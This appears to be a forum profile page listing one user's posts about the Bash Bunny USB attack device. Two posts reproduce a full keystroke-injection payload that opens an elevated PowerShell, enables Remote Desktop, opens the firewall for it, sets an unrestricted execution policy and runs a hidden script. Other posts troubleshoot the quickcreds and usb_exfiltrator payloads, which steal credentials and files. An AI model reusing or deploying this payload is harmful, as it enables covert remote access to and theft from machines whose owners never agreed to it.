Sohrce

Active Members
  • Content Count

    7

About Sohrce

  • Rank
    Newbie


  1. LED R ATTACKMODE HID Q DELAY 750 Q GUI r Q DELAY 1000 QUACK STRING powershell Start-Process notepad -Verb runAs Q ENTER Q DELAY 750 Q ALT y Q DELAY 750 Q ENTER Q ALT Q SPACE Q DELAY 1000 QUACK STRING m Q DELAY 1000 QUACK DOWNARROW REPEAT 100 Q ENTER LED G B 100 QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0 Q ENTER QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1 Q ENTER Quack STRING netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes Q ENTER QUACK STRING netsh advfirewall firewall set rule group='remote desktop' new enable=Yes Q ENTER QUACK STRING Remove-Item $MyINvocation.InvocationName Q ENTER Q CTRL s Q DELAY 1000
  2. I downloaded the Enable RDP duckycode from the Duck Tool Kit example payloads and wanted to modify it to work on the Bash Bunny. I added a Q in front of everything except for the strings, where I added Quack. Will this work, and is there a difference between Quack and Q?
     LED R ATTACKMODE HID Q DELAY 750 Q GUI r Q DELAY 1000 QUACK STRING powershell Start-Process notepad -Verb runAs Q ENTER Q DELAY 750 Q ALT y Q DELAY 750 Q ENTER Q ALT Q SPACE Q DELAY 1000 QUACK STRING m Q DELAY 1000 QUACK DOWNARROW REPEAT 100 Q ENTER LED G B 100 QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0 Q ENTER QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1 ENTER STRING netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes Q ENTER QUACK STRING netsh advfirewall firewall set rule group='remote desktop' new enable=Yes Q ENTER QUACK STRING Remove-Item $MyINvocation.InvocationName Q ENTER Q CTRL s Q DELAY 1000 LED R B QUACK STRING C:\Windows\config-40970.ps1 Q ENTER Q DELAY 1000 Q ALT F4 Q DELAY 750 Q GUI r Q DELAY 750 QUACK STRING powershell Start-Process cmd -Verb runAs Q ENTER Q DELAY 750 Q ALT y Q DELAY 1000 QUACK STRING mode con:cols=14 lines=1 Q ENTER Q ALT SPACE Q DELAY 750 QUACK STRING m Q DELAY 750 QUACK DOWNARROW REPEAT 100 Q ENTER QUACK STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false Q ENTER Q DELAY 750 QUACK STRING powershell.exe -windowstyle hidden -File C:\Windows\config-40970.ps1 Q ENTER LED G
  3. Thanks for replying. I eventually switched the USB port and it began working again. Now all the ports work. I have no clue what could have happened, but it may have been an overheating issue.
  4. After running quickcreds on a Windows 7 computer different from the one I installed everything on the Bash Bunny for, and switching back to the original computer, the Bash Bunny is not showing any LEDs. I tried switching modes, but it still is not working, in arming or not. Because of this I do not believe I can run recovery mode. Any tips?
  5. Sohrce

    Install Tools

    Did you replace TOOLSDIR=$(find /root/udisk/payloads/ -name tools_to_install) with mount -o sync /dev/nandf /root/udisk, or did you just add it after it?
  6. While in arming mode, the loot folder created itself and ran the usb_exfiltrator in switch 1.
  7. After running the usb_exfiltrator in switch 1, I get a Windows error message when trying to open the loot file in arming mode and both switches. When running the usb_exfiltrator I got a red LED and then a green LED, and after looking through the files while still in switch one, the files seemed to be finished downloading, so I unplugged the Bash Bunny. Now I cannot open the loot folder and get a Windows popup that says there is a problem with this drive. Should I run the Windows recovery, or is there a Bash Bunny recovery?